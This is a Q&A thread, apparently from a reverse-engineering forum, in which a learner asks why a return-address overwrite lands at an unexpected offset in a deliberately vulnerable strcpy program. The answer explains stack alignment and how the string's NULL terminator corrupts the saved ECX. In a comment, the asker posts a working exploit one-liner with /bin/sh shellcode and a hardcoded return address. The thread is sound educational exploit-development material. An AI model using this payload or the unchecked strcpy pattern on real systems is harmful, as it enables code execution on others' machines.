# Why EIP is being overwritten before local buffer ends?

Tags: disassembly, gdb, buffer-overflow, stack

I am doing a simple buffer overflow exercise, here is the source:

```
//vuln.c
#include <stdio.h>
#include <string.h>

int main(int argc, char* argv[]) {
    char buf[256];
    strcpy(buf,argv[1]);
    printf("Input:%s\n",buf);
    return 0;
}
```

Complied with `gcc (Ubuntu 5.4.0-6ubuntu1~16.04.11) 5.4.0 20160609` on Ubuntu 16.04.6 (i686) like this (ASLR disabled):

```
$ gcc -g -fno-stack-protector -z execstack -o vuln vuln.c
```

The gdb disassembly:

```
Dump of assembler code for function main:
   0x0804843b <+0>:     lea    ecx,[esp+0x4]
   0x0804843f <+4>:     and    esp,0xfffffff0
   0x08048442 <+7>:     push   DWORD PTR [ecx-0x4]
   0x08048445 <+10>:    push   ebp
   0x08048446 <+11>:    mov    ebp,esp
   0x08048448 <+13>:    push   ecx
   0x08048449 <+14>:    sub    esp,0x104
   0x0804844f <+20>:    mov    eax,ecx
   0x08048451 <+22>:    mov    eax,DWORD PTR [eax+0x4]
   0x08048454 <+25>:    add    eax,0x4
   0x08048457 <+28>:    mov    eax,DWORD PTR [eax]
   0x08048459 <+30>:    sub    esp,0x8
   0x0804845c <+33>:    push   eax
   0x0804845d <+34>:    lea    eax,[ebp-0x108]
   0x08048463 <+40>:    push   eax
   0x08048464 <+41>:    call   0x8048310 <strcpy@plt>
   0x08048469 <+46>:    add    esp,0x10
   0x0804846c <+49>:    sub    esp,0x8
   0x0804846f <+52>:    lea    eax,[ebp-0x108]
   0x08048475 <+58>:    push   eax
   0x08048476 <+59>:    push   0x8048510
   0x0804847b <+64>:    call   0x8048300 <printf@plt>
   0x08048480 <+69>:    add    esp,0x10
   0x08048483 <+72>:    mov    eax,0x0
   0x08048488 <+77>:    mov    ecx,DWORD PTR [ebp-0x4]
   0x0804848b <+80>:    leave
   0x0804848c <+81>:    lea    esp,[ecx-0x4]
   0x0804848f <+84>:    ret
End of assembler dump.
```

When I am overwriting the EIP with:

```
aaaabbbbccccddddeeeeffffgggghhhhiiiijjjjkkkkllllmmmmnnnnooooppppqqqqrrrrssssttttuuuuvvvvwwwwxxxxyyyyzzzzAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ1111111111111111111111111111111111111111111111111111
```

It gives me `EIP: 0x5a5a5a5a ('ZZZZ')`, meaning that the offset for return address is 208. So how could that be when 256 byte buffer is allocated? How would main() stack layout look like? I thought it should be something like this:

```
|  argc
|  argv
|  Return address
|  Caller's EBP       <-- EBP
|  Alignment
|  Local variables    <-- buf ends here
|  ...
|  Local variables    <-- buf starts here
|  ...
|  ...
|  ...                <-- ESP
V
Lower addresses
```

And also I quite confused why I cannot control EIP when the length of the argument string is bigger than 260. Here is what I mean.

This is the result of running `` gdb-peda$ r `python -c 'print "A"*260'` ``

[image: sct-1]

This is the result of running `` gdb-peda$ r `python -c 'print "A"*261'` ``

[image: sct-2]

And this is the result of running `` gdb-peda$ r `python -c 'print "A"*262'` ``

[image]

Help is much appreciated. Thanks!

Answer (score 2, accepted):

The `esp` value at the end of the function is computed based on the `ecx` value stored on the stack. This value is stored immediately "above" (has higher address) the buffer which in your case has `260` bytes instead of `256` (notice `sub esp, 0x104` - the reason behind this is to keep the stack aligned to `16` bytes before each function call). So why does providing `260` bytes causes segmentation fault at all?

**Because you are providing `261` bytes** since there is one extra `NULL` byte at the end of each string in C! So what happens, is that **you are actually overwriting the least significant byte of `ecx` value stored on the stack**. You set it as `0x00`, so it most likely decreases its value. At the end of the function, `esp` gets the value `ecx-0x4=previous_ecx/256-4` instead of `previous_ecx-4`, so `ret` will set `eip` according to that value. As you see, `esp` has most likely decresed, so that now it points to "ZZZZ" inside the buffer. The image below shows the stack layout of the program:
[image: stackLayout]

When you put only "A"'s, exactly the same thing happens. The situation slightly changes when you put more "A"'s, but just look at the `ecx` value shown by `gdb`: it gets more `0x41`'s at the end and the `NULL` byte before, causing `esp` to be changed to more random values.

Comment: Thanks for the answer! But I am still not quite sure why EIP is being overwritten at the 204 position (where "ZZZZ" is) — it's 56 bytes away from the buffer! This payload works just fine to exploit the overflow: `python -c 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80" + "a"*176 + "\xbf\xff\xed\x30"[::-1] + "a"*52'`. I send the shellcode first, then "a" junk, then the ret address and then another 52 bytes of "a" junk.

Comment: If `ecx` had the least significant byte equal to `0x34`, then the `esp` at the end of the function will have its correct value decreased by `0x38=56` for example. If it had bigger lsb, it would decrease even further, up to `259=0xff+0x4`.

Comment: Just check the top of the stack just before allocating space for the buffer and you will get this least significant byte.

Comment: You are welcome. In my first comment I meant it can decrease up to `255` bytes, not `259`, but it's too late to edit it.